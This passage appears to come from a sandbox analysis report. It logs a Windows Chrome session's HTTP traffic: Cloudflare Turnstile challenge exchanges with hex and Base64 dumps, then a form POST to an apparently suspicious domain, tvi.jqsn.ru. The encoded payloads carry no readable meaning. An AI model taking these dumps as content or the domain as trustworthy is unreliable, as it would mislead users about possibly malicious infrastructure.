                                                                                                                          2024-04-17 00:34:31 UTC1369INData Raw: 53 6e 69 46 56 46 65 52 64 58 56 76 57 33 4b 52 5a 49 53 42 66 61 56 6d 6b 33 69 59 61 48 71 6b 6a 71 6d 42 71 34 39 76 64 47 36 42 72 4b 6d 31 74 59 65 31 65 61 69 78 77 62 6d 73 72 62 4f 2f 77 34 4c 41 78 61 61 61 6d 73 32 6e 71 38 53 4e 7a 70 2b 49 71 4c 4b 33 71 4e 65 63 79 64 6d 30 74 73 47 38 74 36 47 75 70 4d 50 48 6e 39 69 37 74 73 7a 6d 76 37 72 62 33 73 58 30 37 2b 62 4b 30 74 48 71 75 4f 33 4a 2f 74 4c 61 75 50 62 57 33 74 2f 30 2b 2b 44 6a 41 51 50 4c 33 67 77 47 44 67 76 52 42 67 51 47 39 65 73 57 32 50 6f 52 42 51 38 55 39 42 38 5a 2f 4e 34 67 48 78 48 7a 4b 51 66 2b 42 41 6a 74 2b 66 6b 44 44 67 51 30 2f 51 59 41 38 68 49 37 4f 51 34 64 46 79 73 64 48 79 49 4e 4e 45 45 57 4f 7a 78 4a 43 6b 6f 6b 47 68 73 6f 4b 79 35 44 52 79 77 79 4a 43 4e
                                                                                                                          Data Ascii: SniFVFeRdXVvW3KRZISBfaVmk3iYaHqkjqmBq49vdG6BrKm1tYe1eaixwbmsrbO/w4LAxaaams2nq8SNzp+IqLK3qNecydm0tsG8t6GupMPHn9i7tszmv7rb3sX07+bK0tHquO3J/tLauPbW3t/0++DjAQPL3gwGDgvRBgQG9esW2PoRBQ8U9B8Z/N4gHxHzKQf+BAjt+fkDDgQ0/QYA8hI7OQ4dFysdHyINNEEWOzxJCkokGhsoKy5DRywyJCN
                                                                                                                          2024-04-17 00:34:31 UTC1369INData Raw: 35 4a 61 67 6c 36 50 6d 49 61 6a 69 47 69 44 6c 71 53 44 70 36 6c 6d 66 34 65 42 6f 72 53 4e 69 34 65 4d 63 58 4f 37 71 48 6d 4a 73 37 6d 36 6e 4a 6c 2f 6a 38 4c 47 6b 71 69 31 6f 63 47 39 6c 37 33 4c 75 70 72 42 76 37 36 68 76 36 75 6e 30 72 79 5a 33 64 6e 61 31 65 43 68 34 73 53 75 6f 62 36 33 31 75 62 57 75 62 71 75 78 61 79 70 72 4f 58 71 37 74 54 76 77 4c 44 69 78 66 50 37 2f 64 62 62 7a 4c 33 7a 42 76 69 39 34 75 54 65 31 75 72 55 33 74 72 6f 37 41 6e 7a 38 51 48 66 7a 78 48 4b 36 51 2f 70 39 51 67 4a 31 2b 34 4f 2f 52 62 67 46 69 51 64 2b 2f 63 4d 4a 78 59 41 47 43 6b 66 42 6a 48 70 39 44 55 75 44 41 6b 70 4b 51 59 58 2b 41 66 2b 4d 7a 35 45 47 68 51 2f 4d 79 52 48 4e 43 51 6f 4f 77 55 6e 51 6a 74 43 54 54 45 51 4b 69 6c 49 4a 45 6f 73 4e 69 77 65
                                                                                                                          Data Ascii: 5Jagl6PmIajiGiDlqSDp6lmf4eBorSNi4eMcXO7qHmJs7m6nJl/j8LGkqi1ocG9l73LuprBv76hv6un0ryZ3dna1eCh4sSuob631ubWubquxayprOXq7tTvwLDixfP7/dbbzL3zBvi94uTe1urU3tro7Anz8QHfzxHK6Q/p9QgJ1+4O/RbgFiQd+/cMJxYAGCkfBjHp9DUuDAkpKQYX+Af+Mz5EGhQ/MyRHNCQoOwUnQjtCTTEQKilIJEosNiwe
                                                                                                                          2024-04-17 00:34:31 UTC1369INData Raw: 4e 6c 65 59 4f 42 70 6e 36 72 67 4a 6d 77 72 36 53 4d 62 35 2b 4a 73 61 71 5a 63 72 42 35 71 70 47 75 6b 4c 43 59 75 37 43 54 67 63 53 77 6f 70 75 45 71 5a 53 48 71 49 71 69 6d 61 2b 66 77 4d 4f 77 6f 6f 71 32 6f 72 47 30 6e 4c 7a 66 77 65 47 71 6d 62 75 2b 32 72 65 6b 36 65 4b 71 70 75 54 4e 76 4c 6e 4e 79 76 53 71 79 76 54 6e 74 63 33 4d 37 2b 33 77 78 75 65 32 30 76 4c 73 42 51 65 2b 33 76 72 6e 32 41 48 36 77 2b 66 59 35 73 63 51 30 42 48 55 7a 64 58 56 46 41 2f 4e 38 39 63 58 30 52 67 66 38 4f 49 6c 45 2b 4c 32 41 65 55 56 47 50 76 37 42 78 34 77 49 50 33 72 36 2f 50 7a 46 67 54 77 44 79 77 36 2b 6a 6a 39 4b 2f 34 43 50 51 51 36 47 68 63 39 4b 79 6f 36 50 52 34 4c 4a 69 73 69 44 53 73 77 56 45 67 6f 4a 44 6f 62 4c 43 64 48 55 54 46 52 4d 6c 51 37 50
                                                                                                                          Data Ascii: NleYOBpn6rgJmwr6SMb5+JsaqZcrB5qpGukLCYu7CTgcSwopuEqZSHqIqima+fwMOwooq2orG0nLzfweGqmbu+2rek6eKqpuTNvLnNyvSqyvTntc3M7+3wxue20vLsBQe+3vrn2AH6w+fY5scQ0BHUzdXVFA/N89cX0Rgf8OIlE+L2AeUVGPv7Bx4wIP3r6/PzFgTwDyw6+jj9K/4CPQQ6Ghc9Kyo6PR4LJisiDSswVEgoJDobLCdHUTFRMlQ7P
                                                                                                                          2024-04-17 00:34:31 UTC1369INData Raw: 6e 5a 49 47 73 6d 6d 35 37 72 70 79 54 64 61 32 78 63 58 4b 49 71 48 6d 35 74 70 53 62 73 35 76 45 74 4a 75 48 70 37 4f 35 75 37 37 49 78 72 75 75 7a 4d 6d 39 6f 73 58 4e 6c 71 43 35 31 64 65 36 79 4b 72 4e 71 72 47 65 73 38 2b 6c 32 4e 76 66 6d 39 58 56 70 39 6e 72 78 74 75 6e 79 72 2f 64 76 2b 66 78 34 63 2f 79 39 66 48 53 36 75 33 68 77 50 66 66 34 2f 76 45 39 74 6a 43 38 2f 72 63 41 74 37 49 2b 51 2f 61 41 66 33 4f 46 52 4d 56 31 41 66 6f 39 65 67 4b 39 78 49 43 32 77 7a 6a 2f 68 77 58 2b 69 72 79 4a 51 30 49 4a 67 73 74 44 77 33 2b 4e 51 66 30 4a 78 66 77 42 77 6f 58 4b 53 6f 58 4f 69 73 38 50 42 34 65 42 77 4e 47 4e 69 64 4e 4e 77 6f 61 47 42 6b 65 48 53 77 68 48 69 41 78 4a 54 46 52 4c 79 6f 6d 55 7a 67 58 4e 45 35 4f 52 52 78 54 4e 69 68 6d 5a 55
                                                                                                                          Data Ascii: nZIGsmm57rpyTda2xcXKIqHm5tpSbs5vEtJuHp7O5u77IxruuzMm9osXNlqC51de6yKrNqrGes8+l2Nvfm9XVp9nrxtunyr/dv+fx4c/y9fHS6u3hwPff4/vE9tjC8/rcAt7I+Q/aAf3OFRMV1Afo9egK9xIC2wzj/hwX+iryJQ0IJgstDw3+NQf0JxfwBwoXKSoXOis8PB4eBwNGNidNNwoaGBkeHSwhHiAxJTFRLyomUzgXNE5ORRxTNihmZU
                                                                                                                          2024-04-17 00:34:31 UTC1369INData Raw: 69 6e 36 4a 71 6f 36 53 67 61 71 4c 62 6f 6d 33 65 6f 70 38 75 34 4f 4f 77 72 65 63 79 4d 65 47 6e 4b 61 37 77 71 4b 6d 6f 4d 4b 77 72 38 43 7a 70 34 71 70 30 70 66 49 31 4c 75 76 6b 74 72 51 6f 64 54 66 31 72 79 61 74 61 69 39 74 39 72 6c 77 65 33 4d 36 72 44 77 30 65 53 33 7a 2b 37 32 79 39 50 5a 39 37 6f 42 33 66 7a 54 42 66 76 47 31 2f 54 45 2b 4d 55 49 79 2f 7a 69 41 67 77 4a 36 4d 59 49 42 4e 66 69 46 77 7a 73 44 65 6b 56 39 4e 63 43 45 2f 62 2b 4a 66 62 2b 46 66 55 5a 35 67 50 72 36 65 2f 6d 41 54 51 44 36 67 59 76 38 54 59 54 47 52 4d 59 4b 43 30 51 51 54 73 30 46 6b 59 77 4e 78 6b 56 4b 6a 6f 65 47 44 6b 64 49 45 45 4a 54 51 38 75 44 45 55 57 43 79 6b 57 48 42 4e 58 46 79 38 54 58 31 77 6b 47 31 73 6e 4a 31 59 2b 57 43 74 64 5a 31 73 77 50 6c 49
                                                                                                                          Data Ascii: in6Jqo6SgaqLbom3eop8u4OOwrecyMeGnKa7wqKmoMKwr8Czp4qp0pfI1LuvktrQodTf1ryatai9t9rlwe3M6rDw0eS3z+72y9PZ97oB3fzTBfvG1/TE+MUIy/ziAgwJ6MYIBNfiFwzsDekV9NcCE/b+Jfb+FfUZ5gPr6e/mATQD6gYv8TYTGRMYKC0QQTs0FkYwNxkVKjoeGDkdIEEJTQ8uDEUWCykWHBNXFy8TX1wkG1snJ1Y+WCtdZ1swPlI
                                                                                                                          2024-04-17 00:34:31 UTC1369INData Raw: 72 6c 37 75 58 64 33 64 61 32 4d 74 59 4e 36 6b 49 57 48 66 70 54 49 66 59 4b 63 69 6f 36 38 73 49 75 54 69 73 61 53 6c 39 58 4b 6b 34 32 53 31 70 6d 62 7a 63 71 62 6f 2b 48 69 70 5a 6e 6c 32 75 6d 71 77 39 37 68 72 2b 33 79 38 61 6e 68 39 72 43 32 35 66 4b 31 72 64 4c 63 75 62 48 58 36 67 48 44 75 67 4d 46 78 74 2f 79 2f 63 73 4b 39 67 37 50 78 73 76 4e 30 67 4c 67 31 64 4d 47 46 39 6a 4e 30 67 66 61 30 52 34 50 33 74 6e 36 42 65 50 5a 4a 68 50 70 36 2b 4c 34 4c 65 45 49 48 79 62 6c 44 43 4d 31 37 53 59 7a 2b 65 30 36 4a 2f 73 41 38 69 48 39 42 45 49 52 42 66 6b 67 47 51 55 4d 41 78 6b 4b 44 44 35 44 45 52 4d 73 56 78 49 58 52 6b 4d 59 44 6b 70 54 55 68 49 34 4c 57 49 57 47 32 4d 6c 47 6b 42 66 4b 68 35 44 54 53 6b 69 53 47 73 77 4a 6d 4a 6a 4e 54 68 32
                                                                                                                          Data Ascii: rl7uXd3da2MtYN6kIWHfpTIfYKcio68sIuTisaSl9XKk42S1pmbzcqbo+HipZnl2umqw97hr+3y8anh9rC25fK1rdLcubHX6gHDugMFxt/y/csK9g7PxsvN0gLg1dMGF9jN0gfa0R4P3tn6BePZJhPp6+L4LeEIHyblDCM17SYz+e06J/sA8iH9BEIRBfkgGQUMAxkKDD5DERMsVxIXRkMYDkpTUhI4LWIWG2MlGkBfKh5DTSkiSGswJmJjNTh2
                                                                                                                          2024-04-17 00:34:31 UTC1369INData Raw: 71 71 73 5a 79 61 70 49 4f 43 6c 5a 32 2b 68 71 69 6f 77 59 47 6e 6f 4d 43 76 69 37 44 58 6c 6f 36 77 6b 35 65 34 76 4a 57 77 6b 71 33 58 6e 73 44 45 32 63 43 2b 74 4e 32 2b 6f 36 6d 39 71 38 66 69 73 4e 44 4b 76 61 33 4b 72 37 53 73 32 4e 50 57 79 37 76 62 76 37 6e 64 41 65 47 34 78 39 4c 79 2b 65 49 4a 37 4d 7a 4b 33 65 55 48 7a 75 2f 54 43 73 6e 76 43 77 6e 33 48 51 63 4f 39 68 30 42 33 4e 6e 36 38 42 72 2b 4a 67 49 67 35 67 63 62 48 67 48 69 2f 53 6a 75 45 4f 73 71 44 7a 55 46 4c 68 59 35 4f 51 67 63 39 77 30 38 47 50 73 2f 4e 51 51 6a 47 79 45 6c 42 53 6b 39 44 43 73 53 4b 53 30 4e 4d 55 55 55 4e 42 41 53 4e 56 6b 36 46 53 41 72 53 31 49 37 46 30 55 68 49 7a 59 2b 58 79 64 49 4a 47 49 69 53 46 74 68 55 48 56 66 5a 6b 38 72 57 54 55 38 4c 30 6c 79 57
                                                                                                                          Data Ascii: qqsZyapIOClZ2+hqiowYGnoMCvi7DXlo6wk5e4vJWwkq3XnsDE2cC+tN2+o6m9q8fisNDKva3Kr7Ss2NPWy7vbv7ndAeG4x9Ly+eIJ7MzK3eUHzu/TCsnvCwn3HQcO9h0B3Nn68Br+JgIg5gcbHgHi/SjuEOsqDzUFLhY5OQgc9w08GPs/NQQjGyElBSk9DCsSKS0NMUUUNBASNVk6FSArS1I7F0UhIzY+XydIJGIiSFthUHVfZk8rWTU8L0lyW


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          21192.168.2.449760104.17.3.1844433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:31 UTC486OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/376309965:1713310987:XtWNF_lGr5ooSfnAjw_nRac0X3c-4XXJ9QQQN9vg0as/875854595e7f53f2/ce9d72d10a780bc HTTP/1.1
                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-04-17 00:34:31 UTC386INHTTP/1.1 400 Bad Request
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:31 GMT
                                                                                                                          Content-Type: application/json
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                          cf-chl-out: PrcfrEYfUPLBiAGAVIw7PA==$oo8shgpvBDvuY4TZnMIjiw==
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 87585474fb77ad5f-ATL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-04-17 00:34:31 UTC12INData Raw: 37 0d 0a 69 6e 76 61 6c 69 64 0d 0a
                                                                                                                          Data Ascii: 7invalid
                                                                                                                          2024-04-17 00:34:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          22192.168.2.449767104.17.2.1844433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:41 UTC916OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/376309965:1713310987:XtWNF_lGr5ooSfnAjw_nRac0X3c-4XXJ9QQQN9vg0as/875854595e7f53f2/ce9d72d10a780bc HTTP/1.1
                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          Content-Length: 31924
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          Content-type: application/x-www-form-urlencoded
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          CF-Challenge: ce9d72d10a780bc
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Origin: https://challenges.cloudflare.com
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/8so0y/0x4AAAAAAAWQVeGKc1PBnczu/auto/normal
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-04-17 00:34:41 UTC16384OUTData Raw: 76 5f 38 37 35 38 35 34 35 39 35 65 37 66 35 33 66 32 3d 76 56 44 36 68 34 37 6a 39 34 56 48 24 31 53 65 69 4f 76 4f 48 36 46 73 6e 4f 58 36 4b 57 48 62 62 4f 6d 4f 76 36 48 53 4f 63 35 4f 54 57 31 56 57 4f 61 62 4f 75 33 34 4b 6f 37 4e 35 4f 75 69 33 62 38 4f 43 68 73 24 36 4f 6f 36 37 62 75 25 32 62 4f 75 75 47 4f 50 76 59 62 47 4f 46 32 4f 37 61 4f 57 64 57 37 63 55 65 58 37 66 69 24 36 63 56 39 64 4f 76 33 37 67 4f 54 73 36 46 69 77 4f 75 24 4f 64 64 54 69 36 36 4f 65 31 4f 65 61 44 4f 37 72 37 63 34 57 24 4f 4f 72 45 75 58 36 56 57 45 24 4f 70 54 70 33 71 63 68 24 36 4f 59 37 75 71 57 33 69 31 62 6a 4f 35 4b 5a 4f 48 47 4f 36 75 45 45 4f 4f 6a 4f 57 71 45 37 31 48 44 54 31 45 77 37 48 63 46 38 39 43 55 4f 64 57 6d 67 33 57 51 4a 77 6e 4e 6a 36 47 31
                                                                                                                          Data Ascii: v_875854595e7f53f2=vVD6h47j94VH$1SeiOvOH6FsnOX6KWHbbOmOv6HSOc5OTW1VWOabOu34Ko7N5Oui3b8OChs$6Oo67bu%2bOuuGOPvYbGOF2O7aOWdW7cUeX7fi$6cV9dOv37gOTs6FiwOu$OddTi66Oe1OeaDO7r7c4W$OOrEuX6VWE$OpTp3qch$6OY7uqW3i1bjO5KZOHGO6uEEOOjOWqE71HDT1Ew7HcF89CUOdWmg3WQJwnNj6G1
                                                                                                                          2024-04-17 00:34:41 UTC15540OUTData Raw: 44 73 76 73 4f 50 34 4f 4f 34 49 6a 4e 54 44 41 47 65 5a 34 34 45 57 4f 62 52 67 33 34 5a 43 70 36 57 42 65 6c 45 46 62 57 57 48 52 6b 41 79 35 7a 34 36 37 24 4f 45 4f 31 57 37 4b 4f 4e 4f 4f 33 4f 38 36 54 48 45 43 37 55 47 70 44 48 47 57 57 56 37 36 35 24 37 78 4f 50 36 31 56 4f 37 4f 4f 77 62 53 37 43 4f 63 57 34 58 4f 57 4f 46 57 65 6f 4f 72 4f 4d 57 48 7a 37 68 4f 4b 33 62 47 37 4e 4f 6c 33 37 49 6b 45 39 55 77 71 2b 37 55 52 55 4f 76 6b 4f 6f 4f 61 6c 36 42 36 36 52 63 62 62 36 34 41 4f 35 4f 63 57 37 7a 4f 65 33 48 4f 4f 72 4f 24 4b 6f 67 77 73 4f 31 33 62 39 37 45 39 64 4f 76 24 4f 63 4f 4e 36 31 72 4f 57 4f 44 57 31 6d 36 43 4f 5a 57 4f 6f 4f 59 4f 50 4f 50 44 65 72 4f 46 34 34 41 4f 67 4f 38 33 35 47 37 43 33 37 33 65 66 36 64 4f 24 36 65 5a 37
                                                                                                                          Data Ascii: DsvsOP4OO4IjNTDAGeZ44EWObRg34ZCp6WBelEFbWWHRkAy5z467$OEO1W7KONOO3O86THEC7UGpDHGWWV765$7xOP61VO7OOwbS7COcW4XOWOFWeoOrOMWHz7hOK3bG7NOl37IkE9Uwq+7URUOvkOoOal6B66Rcbb64AO5OcW7zOe3HOOrO$KogwsO13b97E9dOv$OcON61rOWODW1m6COZWOoOYOPOPDerOF44AOgO835G7C373ef6dO$6eZ7
                                                                                                                          2024-04-17 00:34:41 UTC1223INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:41 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          cf-chl-out: I7ZjhcX/ZpiHA3KAs9vi/CGgoFRs/bMl5AnRPb3Uiqo6TqYMgVh5bqyE29iV+5AnnAOErH+ax4974q2QfYYrDap9+KszeHjlnSc8KUBAKFoSCMV4ZFzY25sFjCruv01K$P4q2nPJMgzRCOidZU9+fOw==
                                                                                                                          cf-chl-out-s: oGubaGxbv5WOmLV6K2ItEaJhWZkbgk57vIzkRXMjUsFzcXZ8e5E2eIQwAbcNdHxccO5HSdIel1ipaJsa2VBFlTy9lonxOPxO2NyqTFxbG85yMixgDBJkEH23BniOyGQpdGasrPaGn48keGe6CvlWrSUCOASPYe4nRueNEDNuRX0OK3GgKuinWBC08FJ7in3OWs/FlxdyNUyVloK6tdMZkEPae8S9LWbBGBQBsORqcr4bOlgfhGq/cfhccy2bBiINfJ1M8McGTQ2xfiFq6VOmGjqb42WiqjoDt25f00wEcGSirYGgA0Lr6wyCYiBqOCXDu5MGsLfKgAE4JyuAr2YAIuGNBxcAek5/eEYEO7WlHxHWdckuZYxW6nyQ34zb01awa/BGayPmMreibVNtwFnqW/sE1lYgsXODIw9q/ZlTDNmR0K59JzossfnrZj6Oe4vs9RQeH1hwDor6QANohZRb03GyWMeZN9lQoAm/Y211FGQqmASVQDYLb3uF6SH0ZBYwiXayci3P21q2SCYhiqoz+v35+fDoUh3/LzIEjvfg+V2DMPD3CjUME3PFBC9YLhifprmcCi/8qiEi/66oN2ytUKULBArNgXrxEWZgUxm0YMvNKmoF1XPaeURGXKLCnZGyFxxiIRLuTuxcEnFJUsaCv/XNc5vZDlQxSHhR9opVa6cXoan4ReacTnR9l0khA+iGdd/wDp1XM/LonPyzjrO2W1sx3hA5DEahdZwaywpPn4d6ltgH6lzZpHQOITdbhq6SnSRUgm+iDnfHxqw5+eW38w==$PPSqhzYwY+NUgKxff0rWlw==
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 875854b06f50adb2-ATL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-04-17 00:34:41 UTC146INData Raw: 64 31 30 0d 0a 65 57 4e 2f 62 46 31 6b 58 49 75 4d 64 6b 69 4e 6b 6d 61 4b 6a 6d 71 49 6a 31 6c 63 6e 70 65 62 59 4a 4b 69 67 35 32 59 5a 4a 56 33 68 49 70 38 65 49 69 53 62 71 61 49 73 49 43 35 6b 62 75 35 66 4a 57 2f 76 59 42 33 76 4a 64 36 6d 6e 79 34 75 5a 72 49 76 71 32 2f 6c 37 65 72 69 5a 75 70 71 39 62 4e 72 74 43 71 70 74 4b 39 6c 4e 7a 4c 73 2b 4b 39 6d 64 75 36 75 65 4c 67 35 39 54 44 75 62 62 4f 79 4e 44 44 79 73 79 72 7a
                                                                                                                          Data Ascii: d10eWN/bF1kXIuMdkiNkmaKjmqIj1lcnpebYJKig52YZJV3hIp8eIiSbqaIsIC5kbu5fJW/vYB3vJd6mny4uZrIvq2/l7eriZupq9bNrtCqptK9lNzLs+K9mdu6ueLg59TDubbOyNDDysyrz
                                                                                                                          2024-04-17 00:34:41 UTC1369INData Raw: 4d 48 78 74 2f 62 4a 36 62 66 30 41 4d 6a 41 36 76 44 66 75 76 4f 38 42 64 4c 33 38 37 33 57 31 63 6e 6d 2f 4e 6b 4c 7a 39 51 42 42 4f 50 52 37 68 63 4d 48 52 6b 51 41 43 41 63 4a 50 55 5a 46 39 34 58 35 66 33 6b 48 75 66 66 43 65 6b 49 4a 2f 44 6c 42 2f 49 75 44 6a 6b 71 50 42 67 2b 50 44 73 4b 43 52 6b 41 51 77 51 75 4e 2f 6c 49 52 41 67 39 54 68 38 37 4b 67 74 41 4c 78 45 4e 45 55 4e 46 4f 55 73 74 4c 6b 31 61 4d 6c 63 65 58 68 78 6a 4f 7a 78 49 4d 6b 4a 68 4e 6a 73 6b 49 45 35 63 52 56 31 6a 4c 69 31 47 5a 30 35 6e 4f 6e 78 46 56 57 31 38 4f 6a 31 41 53 30 42 53 63 56 6d 48 64 32 4a 70 53 46 64 69 62 33 42 4c 6a 34 6c 6e 5a 32 4e 6b 5a 33 4a 37 62 6d 69 4f 57 31 57 57 67 59 78 62 59 5a 6d 4f 6d 61 4f 6a 67 6e 5a 31 62 61 6c 75 69 6d 74 6f 68 36 53 54
                                                                                                                          Data Ascii: MHxt/bJ6bf0AMjA6vDfuvO8BdL3873W1cnm/NkLz9QBBOPR7hcMHRkQACAcJPUZF94X5f3kHuffCekIJ/DlB/IuDjkqPBg+PDsKCRkAQwQuN/lIRAg9Th87KgtALxENEUNFOUstLk1aMlceXhxjOzxIMkJhNjskIE5cRV1jLi1GZ05nOnxFVW18Oj1AS0BScVmHd2JpSFdib3BLj4lnZ2NkZ3J7bmiOW1WWgYxbYZmOmaOjgnZ1baluimtoh6ST
                                                                                                                          2024-04-17 00:34:41 UTC1369INData Raw: 66 32 7a 50 37 78 76 67 4f 39 34 38 50 63 77 41 49 44 35 2f 76 73 39 63 41 4d 44 4d 2f 36 79 2f 54 6e 79 42 59 54 41 2f 54 55 2f 50 44 72 45 52 77 41 39 78 49 67 2b 50 7a 67 49 2f 63 41 47 77 33 37 43 65 6b 72 42 51 51 69 46 53 38 46 4e 7a 4d 75 46 54 6b 63 2b 78 46 41 49 54 6f 44 4e 43 55 75 41 7a 67 70 42 2f 78 4e 4c 41 59 50 50 54 46 4b 45 30 49 31 4a 44 46 59 4c 52 6b 6b 50 46 6c 51 4f 69 39 41 47 55 78 51 5a 6d 56 45 58 56 68 62 53 32 56 5a 4b 32 4e 59 5a 56 46 79 52 6d 64 31 62 7a 4a 4f 52 56 63 30 4e 6b 35 34 57 48 6b 39 56 33 78 78 65 58 6c 32 65 59 6c 65 56 6f 36 4d 57 47 31 4c 6a 6e 47 49 58 6f 4f 4d 56 46 4f 4d 68 49 78 58 56 59 69 52 63 32 75 64 6e 70 4f 50 67 71 4f 43 71 57 46 36 67 36 78 70 61 6f 4f 48 65 33 53 67 74 70 53 4f 67 36 6d 54 66
                                                                                                                          Data Ascii: f2zP7xvgO948PcwAID5/vs9cAMDM/6y/TnyBYTA/TU/PDrERwA9xIg+PzgI/cAGw37CekrBQQiFS8FNzMuFTkc+xFAIToDNCUuAzgpB/xNLAYPPTFKE0I1JDFYLRkkPFlQOi9AGUxQZmVEXVhbS2VZK2NYZVFyRmd1bzJORVc0Nk54WHk9V3xxeXl2eYleVo6MWG1LjnGIXoOMVFOMhIxXVYiRc2udnpOPgqOCqWF6g6xpaoOHe3SgtpSOg6mTf
                                                                                                                          2024-04-17 00:34:41 UTC467INData Raw: 34 2f 74 66 45 7a 77 4c 43 2b 39 54 73 7a 50 72 4c 79 50 76 6b 41 51 76 56 45 4f 44 34 35 2f 51 4c 45 68 6b 50 45 79 45 58 4a 41 51 67 42 41 44 6d 4a 79 55 71 49 78 6e 72 42 76 6b 73 45 54 4d 72 4d 76 50 73 43 50 41 6c 49 79 30 35 48 2f 34 7a 4e 6a 74 41 45 7a 73 36 4f 6a 51 6f 52 42 51 4b 4e 53 45 59 51 6a 6b 77 49 45 52 51 50 68 4e 47 4f 54 68 4b 55 7a 31 57 48 30 35 41 47 68 39 56 54 55 34 6e 56 47 51 34 50 53 4e 6d 4a 30 52 69 57 55 38 6c 4b 32 35 75 4b 58 6c 68 52 7a 74 76 64 6a 78 63 62 47 42 32 59 59 56 6c 57 56 42 37 61 6e 4e 6f 65 6f 68 32 53 33 2b 4d 65 32 79 43 64 6d 6c 68 6c 70 4e 74 65 49 71 57 57 31 47 68 67 6f 35 39 58 6e 52 6c 68 59 43 6a 71 48 6c 69 62 49 57 63 62 6e 36 76 69 59 69 6c 67 4a 53 30 67 37 69 47 62 6f 64 30 66 58 5a 33 73 4c
                                                                                                                          Data Ascii: 4/tfEzwLC+9TszPrLyPvkAQvVEOD45/QLEhkPEyEXJAQgBADmJyUqIxnrBvksETMrMvPsCPAlIy05H/4zNjtAEzs6OjQoRBQKNSEYQjkwIERQPhNGOThKUz1WH05AGh9VTU4nVGQ4PSNmJ0RiWU8lK25uKXlhRztvdjxcbGB2YYVlWVB7anNoeoh2S3+Me2yCdmlhlpNteIqWW1Ghgo59XnRlhYCjqHlibIWcbn6viYilgJS0g7iGbod0fXZ3sL
                                                                                                                          2024-04-17 00:34:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          23192.168.2.449769104.21.3.1474433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:41 UTC1405OUTPOST /glVuTopMUrrdyu89qRN0N14qAuhvIhKVz2 HTTP/1.1
                                                                                                                          Host: tvi.jqsn.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          Content-Length: 1305
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryNAlp6I6odYg8C6rA
                                                                                                                          Accept: */*
                                                                                                                          Origin: https://tvi.jqsn.ru
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Referer: https://tvi.jqsn.ru/i8jbs1sy/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
